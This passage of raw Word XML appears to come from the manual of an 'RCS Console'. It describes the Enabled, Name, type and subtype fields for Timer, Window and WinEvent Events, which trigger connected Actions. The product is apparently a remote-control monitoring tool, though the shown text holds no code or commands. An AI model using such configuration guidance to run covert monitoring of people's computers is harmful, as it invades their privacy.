            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1096" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:187.5pt;height:193.5pt;z-index:251735040;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId107" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1096" DrawAspect="Content" ObjectID="_1446455356" r:id="rId108"/>
              </w:object>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRDefault="0010013A" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4.10</w:t>
            </w:r>
            <w:r w:rsidR="0029750F">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="0029750F" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="0029750F">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="0029750F" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="0029750F">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidR="0029750F" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="0029750F">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="0029750F" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="00A52C9B" w:rsidRDefault="0029750F" w:rsidP="0029750F">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(Timer)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00446D19" w:rsidRDefault="00446D19" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5355" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00446D19" w:rsidRPr="0029750F" w:rsidRDefault="00446D19" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00446D19" w:rsidRPr="0029750F" w:rsidRDefault="00446D19" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00446D19" w:rsidRPr="0029750F" w:rsidRDefault="00446D19" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Enabled</w:t>
            </w:r>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] allows to specify if the Event is active or not. If an Event is not enabled no connected Actions will be called.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00446D19" w:rsidRPr="0029750F" w:rsidRDefault="00446D19" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00446D19" w:rsidRPr="0029750F" w:rsidRDefault="00446D19" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is the Event’s name.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00446D19" w:rsidRPr="0029750F" w:rsidRDefault="00446D19" w:rsidP="0029750F">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w:t>
            </w:r>
            <w:r w:rsidR="002B32DE" w:rsidRPr="0029750F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">(1) </w:t>
            </w:r>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>allows you to specify which type of Event you’re about to create.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00446D19" w:rsidRPr="0029750F" w:rsidRDefault="005C6FDC" w:rsidP="00E14BDC">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(2) allows you to specify the sub-type of the Timer Event. It can be “</w:t>
            </w:r>
            <w:r w:rsidR="00FA0070" w:rsidRPr="0029750F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Loop</w:t>
            </w:r>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidR="00FA0070" w:rsidRPr="0029750F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>, “Daily”, “Date”</w:t>
            </w:r>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> or “</w:t>
            </w:r>
            <w:r w:rsidR="00FA0070" w:rsidRPr="0029750F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>AfterInst</w:t>
            </w:r>
            <w:r w:rsidR="00C93347">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>”.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00104CC3" w:rsidRDefault="00104CC3" w:rsidP="000D4BBF">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00104CC3" w:rsidRDefault="00104CC3">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>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0D4BBF" w:rsidTr="0029750F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0029750F" w:rsidRDefault="0029750F" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRDefault="0010013A" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4.11</w:t>
            </w:r>
            <w:r w:rsidR="0029750F">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="0029750F" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="0029750F">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="0029750F" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="0029750F">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidR="0029750F" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="0029750F">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="0029750F" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000D4BBF" w:rsidRPr="00A52C9B" w:rsidRDefault="0029750F" w:rsidP="0029750F">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(Window)</w:t>
            </w:r>
            <w:r w:rsidR="003A4380">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1098" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:187.5pt;height:160.5pt;z-index:251737088;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId109" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1098" DrawAspect="Content" ObjectID="_1446455357" r:id="rId110"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="289" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000D4BBF" w:rsidRDefault="000D4BBF" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000D4BBF" w:rsidRPr="0029750F" w:rsidRDefault="000D4BBF" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="000D4BBF" w:rsidRPr="0029750F" w:rsidRDefault="000D4BBF" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="000D4BBF" w:rsidRPr="0029750F" w:rsidRDefault="000D4BBF" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Enabled</w:t>
            </w:r>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] allows to specify if the Event is active or not. If an Event is not enabled no connected Actions will be called.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="000D4BBF" w:rsidRPr="0029750F" w:rsidRDefault="000D4BBF" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is the Event’s name.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="000D4BBF" w:rsidRPr="0029750F" w:rsidRDefault="000D4BBF" w:rsidP="000D4BBF">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allows you to specify which type o</w:t>
            </w:r>
            <w:r w:rsidR="00C93347">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>f Event you’re about to create.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="000D4BBF" w:rsidRDefault="000D4BBF" w:rsidP="000D4BBF">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00446D19" w:rsidRDefault="00446D19" w:rsidP="00785BC7">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>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0D4BBF" w:rsidTr="0029750F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000D4BBF" w:rsidRDefault="003A4380" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1100" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:187.5pt;height:221.25pt;z-index:251739136;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId111" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1100" DrawAspect="Content" ObjectID="_1446455358" r:id="rId112"/>
              </w:object>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRDefault="0010013A" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4.12</w:t>
            </w:r>
            <w:r w:rsidR="0029750F">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="0029750F" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="0029750F">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="0029750F" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="0029750F">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidR="0029750F" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="0029750F">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="0029750F" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="00A52C9B" w:rsidRDefault="0029750F" w:rsidP="0029750F">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(WinEvent)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="289" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000D4BBF" w:rsidRDefault="000D4BBF" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000D4BBF" w:rsidRPr="0029750F" w:rsidRDefault="000D4BBF" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="000D4BBF" w:rsidRPr="0029750F" w:rsidRDefault="000D4BBF" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="000D4BBF" w:rsidRPr="0029750F" w:rsidRDefault="000D4BBF" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Enabled</w:t>
            </w:r>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] allows to specify if the Event is active or not. If an Event is not enabled no connected Actions will be called.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="000D4BBF" w:rsidRPr="0029750F" w:rsidRDefault="000D4BBF" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is the Event’s name.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="000D4BBF" w:rsidRPr="0029750F" w:rsidRDefault="000D4BBF" w:rsidP="0029750F">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allows you to specify which type of Event you’re about to create.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00582550" w:rsidRPr="0029750F" w:rsidRDefault="00582550" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>EventID</w:t>
            </w:r>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="005619DE" w:rsidRPr="0029750F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">is the </w:t>
            </w:r>
